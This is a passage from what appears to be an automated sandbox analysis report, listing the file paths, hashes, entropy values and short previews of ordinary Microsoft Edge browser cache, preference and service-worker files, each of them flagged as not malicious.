                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F26BF95F621A2DE8A1D155D056789D8E20DF5B7F4905C041A9747B7D3D5263DEB6574747AE352364476DD7D9CF8FD61467C237408151A25B85FA6CA3B877FD8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376067971858364","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376067971858364","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):113998
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.579413829346636
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:Aa906yxPXfOrr1lhCe1nL/rmL/rSZXsCjaWNcHM1LLKWp+R:79LyxPXfOrr1lMe1nL/CL/SXsA84+wK
                                                                                                                                                                                                                                                                                                                                                        MD5:984F89D8DF353F5F85465415AA4DC289
                                                                                                                                                                                                                                                                                                                                                        SHA1:5F28EDABC27B5A01D88AF4D67BABE8B76B6411B7
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AA43381B553E65665959EAAAD57FD60C13B623B54C76ACA7C419D2DFA24B55B5
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0661F74F469FA22DAC51056EB27F8CCC0E80D7AEF8B251558637FC8D4A591775D1862BFFD498F8E5C40F69546D623392948E99B8F028CA02729DC588C44544D7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):188241
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.38264205537903
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:LCIQOUcllurBcwh/rEIOL/OaMMnH5KzL8UDnSAUVUveP:d6cw1ERL/xnZK0UjScvc
                                                                                                                                                                                                                                                                                                                                                        MD5:18B00508974B4CA9BE6A7597781AE679
                                                                                                                                                                                                                                                                                                                                                        SHA1:1266001E55EB2623CC3F7A0D637861CB68C31E56
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AEAF181228C2CF9B1F9C5CDD2CF9E867C8B84FAF94D3C86DB4F4101C20AA11CB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:283C184C6DD2C520023AF38EB8244776FD645377D7A96804B8457EC081ACB91BC6A3104D4F54D6D7F2D0A19A8D035DDD2DB93B4321B839368CFEA88EDFF1745C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0....z3.................;I....x..........,T.8..`,.....L`.....,T...`......L`......Rc.!|?....exports...Rcb9......module....Rc~......define....Rb........amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.R..b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....V...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:wzFQyXl/lKtn/lxE0tllStIwvTn:weKKW006aTn
                                                                                                                                                                                                                                                                                                                                                        MD5:BE6CCF040564E87C81626FBB0C44880B
                                                                                                                                                                                                                                                                                                                                                        SHA1:0F35B795BFEFEBD02AB6772B6C02886B752859F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4587253427545B26FC5B3A0F0D66F39A153B7949D5C5737579AFD1CEA274A885
                                                                                                                                                                                                                                                                                                                                                        SHA-512:321A94866A6EE08218B85C1C7DF9B9187A916E416BCDACFA20C9AF6F97D15440CFC5112DA39B0F5B0685B9D08CBE35301625E5D1CC4F06CF93F86C6A72AC24BC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:@....l..oy retne.........................X....,...................v./.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:wzFQyXl/lKtn/lxE0tllStIwvTn:weKKW006aTn
                                                                                                                                                                                                                                                                                                                                                        MD5:BE6CCF040564E87C81626FBB0C44880B
                                                                                                                                                                                                                                                                                                                                                        SHA1:0F35B795BFEFEBD02AB6772B6C02886B752859F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4587253427545B26FC5B3A0F0D66F39A153B7949D5C5737579AFD1CEA274A885
                                                                                                                                                                                                                                                                                                                                                        SHA-512:321A94866A6EE08218B85C1C7DF9B9187A916E416BCDACFA20C9AF6F97D15440CFC5112DA39B0F5B0685B9D08CBE35301625E5D1CC4F06CF93F86C6A72AC24BC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:@....l..oy retne.........................X....,...................v./.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF4bdfd.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:wzFQyXl/lKtn/lxE0tllStIwvTn:weKKW006aTn
                                                                                                                                                                                                                                                                                                                                                        MD5:BE6CCF040564E87C81626FBB0C44880B
                                                                                                                                                                                                                                                                                                                                                        SHA1:0F35B795BFEFEBD02AB6772B6C02886B752859F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4587253427545B26FC5B3A0F0D66F39A153B7949D5C5737579AFD1CEA274A885
                                                                                                                                                                                                                                                                                                                                                        SHA-512:321A94866A6EE08218B85C1C7DF9B9187A916E416BCDACFA20C9AF6F97D15440CFC5112DA39B0F5B0685B9D08CBE35301625E5D1CC4F06CF93F86C6A72AC24BC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:@....l..oy retne.........................X....,...................v./.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\18c19f9a-a31d-488e-bed7-8b477acfd4d2.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\71155944-2004-4b01-86b2-d680d32cd65a.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF45456.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c8559d6e-9f24-46ef-b277-edb6ac782a68.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
